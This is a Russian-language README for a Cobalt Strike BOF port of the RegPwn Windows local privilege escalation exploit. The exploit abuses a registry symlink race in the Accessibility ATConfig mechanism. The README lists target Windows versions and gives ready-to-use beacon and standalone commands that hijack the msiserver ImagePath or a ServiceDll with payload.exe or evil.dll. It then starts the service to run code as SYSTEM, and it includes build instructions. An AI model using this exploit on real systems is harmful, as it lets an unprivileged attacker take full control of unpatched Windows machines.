
Буферное переполнение RegPwn от MDSec
Порт Cobalt Strike BOF эксплойта RegPwn от Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.
Это неаккуратная реимплементация BOF оригинального эксплойта на C#. Вся заслуга в исследовании уязвимости и эксплойте принадлежит Filip Dragovic и MDSec.
Эксплуатирует состояние гонки симлинков реестра в механизме Windows Accessibility ATConfig для записи произвольных значений в защищенные ключи реестра HKLM из контекста обычного пользователя (локальное повышение привилегий).
Целевые системы: Windows 11 25H2/24H2, Windows 10 21H2 и Windows Server 2016/2019/2022 до мартовского обновления 2026 года.
ПРЕДУПРЕЖДЕНИЕ: Этот эксплойт блокирует рабочую станцию как часть состояния гонки.
Служба msiserver (установщик Windows) с параметром ImagePath. Эта служба работает как SYSTEM и может быть запущена обычными пользователями.
Загрузите regpwn.cna в Script Manager, затем:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
После успешного выполнения эксплойта запустите службу для выполнения от имени SYSTEM:
net start msiserver
Требуется x86_64-w64-mingw32-gcc (кросс-компилятор MinGW-w64).
make # сборка BOF (regpwn.x64.o)
make test # сборка автономного EXE (regpwn.x64.exe)
make clean
Только x64.